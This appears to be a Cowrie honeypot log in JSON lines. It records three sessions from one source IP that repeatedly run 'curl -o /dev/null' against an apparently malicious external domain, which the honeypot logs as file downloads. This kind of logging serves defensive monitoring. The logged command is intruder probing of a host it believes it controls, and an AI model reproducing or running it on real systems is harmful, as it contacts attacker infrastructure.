{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.500571Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.518615Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.519296Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.524122Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.525148Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.525688Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.528147Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.532495Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.549112Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.549828Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.554739Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.556598Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.558035Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.558866Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.578822Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.579470Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.584077Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.585850Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.587067Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.587689Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.593924Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.619688Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.646451Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.647187Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.650138Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.650955Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.655759Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.657597Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.658778Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.660184Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.685486Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.686168Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.688613Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.689881Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.692983Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.695776Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.698803Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.699349Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.723894Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.726052Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.726732Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.731375Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.733145Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.736245Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.738567Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.742017Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.742868Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.746301Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.770598Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.771543Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.775009Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.775508Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.780246Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.782937Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.784517Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.784912Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.788671Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.814282Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.814952Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.816708Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.817308Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.823633Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.825471Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.828219Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.829301Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.829950Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.855251Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.855987Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.860522Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.862073Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.864981Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.865529Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.868468Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.885971Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.886621Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.891957Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.893719Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
